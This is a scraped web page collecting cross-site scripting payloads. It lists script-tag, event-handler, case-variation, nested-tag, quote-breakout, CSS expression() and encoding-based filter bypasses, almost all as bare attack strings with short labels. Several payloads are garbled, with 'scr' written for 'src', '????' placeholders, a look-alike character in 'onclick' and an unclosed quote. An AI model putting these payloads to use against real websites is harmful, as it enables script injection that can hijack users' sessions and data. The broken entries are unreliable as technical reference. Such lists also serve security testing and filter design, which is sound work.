当前位置:网站首页>XSS collect common code
XSS collect common code
2022-07-25 22:26:00 【Chang Jiazhuang】
The longest used must be :
<script>alert("xss")</script>
DOM Type general use
<a href='#' onclick="alert(1111)">Click to see?</a>
Case around
'"><sCrIpT>alert(63252)</sCrIpT>
Filter script Bypass
<scr<script>ipt>alert("XXSSSS")</scr</script>ipt>
htmlentities() No filter single quotation marks , Directly use single quotation marks to bypass
';alert('xss');'
structure js Bypass
</script><script>alert('xss')</script>
Other code collected
<img scr=javascript:alert("xss")></img>
http://www.example.com/MyApp.aspx?myvar= "></XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<IFRAME SRC=javascript:alert('test')></IFRAME>
" οnclick="alert(1)"
<img scr="javascript: alert(/xss/)></img>
(? use tab Key out of the space )
<img scr="javas????cript:alert(/xss/)" width=150></img>
<img scr="#" onerror=alert(/xss/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
(/**/ Notation )
<img scr="#"/* */onerror=alert(/xss/) width=150></img>
<img src=vbscript:msgbox ("xss")></img>
<style> input {
left:expression (alert('xss'))}</style>
<div style={
left:expression (alert('xss'))}></div>
<div style={
left:exp/* */ression (alert('xss'))}></div>
<div style={
left:\0065\0078ression (alert('xss'))}></div>
html Entity <div style={
left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
Update from time to time during collection ……
边栏推荐
- ORM common requirements
- mysql: error while loading shared libraries: libncurses.so. 5: cannot open shared object file: No suc
- 点亮字符串中所有需要点亮的位置,至少需要点几盏灯
- 【C语法】void*浅说
- 分割金条的代价
- Explore the use of self increasing and self decreasing operators
- Recursive case -c
- 淦,为什么 '𠮷𠮷𠮷' .length !== 3 ??
- ThreadLocal summary (to be continued)
- internship:普通常用的工具类编写
猜你喜欢

Build commercial projects based on ruoyi framework

数据平台下的数据治理

【集训DAY15】简单计算【树状数组】【数学】
![[C syntax] void*](/img/34/b29b7bbf8eae9f1730352cac1301a4.png)
[C syntax] void*

科大讯飞智能办公本Air电纸书阅读器,让我的工作生活更加健康

xss-工具-Beef-Xss安装以及使用

还不懂mock测试?一篇文章带你熟悉mock

Compile and decompile

Get together for ten years, tell your story, millions of gifts are waiting for you

H5 lucky scratch lottery free official account + direct operation
随机推荐
英文术语对应的解释
Wechat card issuing applet source code - automatic card issuing applet source code - with flow main function
Usage of in in SQL DQL query
『SignalR』. Net using signalr for real-time communication
H5幸运刮刮乐抽奖 免公众号+直运营
力矩电机控制基本原理
启牛商学院和微淼商学院哪个靠谱?老师推荐的开户安全吗?
Don't know mock test yet? An article to familiarize you with mock
Short circuit effect of logical operators short circuit and short circuit or
mysql: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No suc
On the difference between break and continue statements
How to resolve a domain name to multiple IP addresses?
Wechat applet (anti shake, throttling), which solves the problem that users keep pulling down refresh requests or clicking buttons to submit information; Get the list information and refresh the data
访问者模式(visitor)模式
Math programming classification
Xiaobai programmer's first day
Playwright tutorial (I) suitable for Xiaobai
H5 lucky scratch lottery free official account + direct operation
Leetcode 106. construct binary tree from middle order and post order traversal sequence
How is it most convenient to open an account for stock speculation? Is it safe for online account managers to open an account